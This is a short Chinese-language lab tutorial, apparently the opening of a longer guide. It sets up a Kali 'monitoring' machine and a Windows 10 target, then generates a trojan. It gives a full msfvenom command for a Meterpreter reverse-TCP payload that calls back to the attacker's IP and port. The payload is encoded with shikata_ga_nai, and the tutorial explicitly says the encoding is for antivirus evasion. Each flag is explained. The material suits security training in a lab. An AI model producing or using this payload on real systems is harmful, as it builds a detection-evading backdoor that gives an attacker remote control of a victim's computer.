一、环境准备
使用到的机器:
系统 | IP地址 | 描述 |
kali | 192.168.230.128 | 监控机 |
Windows10 | 192.168.230.131 | 靶机 |
使用到的工具:
MSF-Metasploit Framework(kali自带)
二、生成木马
使用到的命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.128 LPORT=4567 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5
命令解读:
-p | 添加载荷payload(选择与靶机相符的) |
LHOST | 监控机的IP |
LPORT | 监控机的端口 |
-e | 编码免杀 |
-f | 指定文件输出格式 |
-o | 文件输出(即文件名) |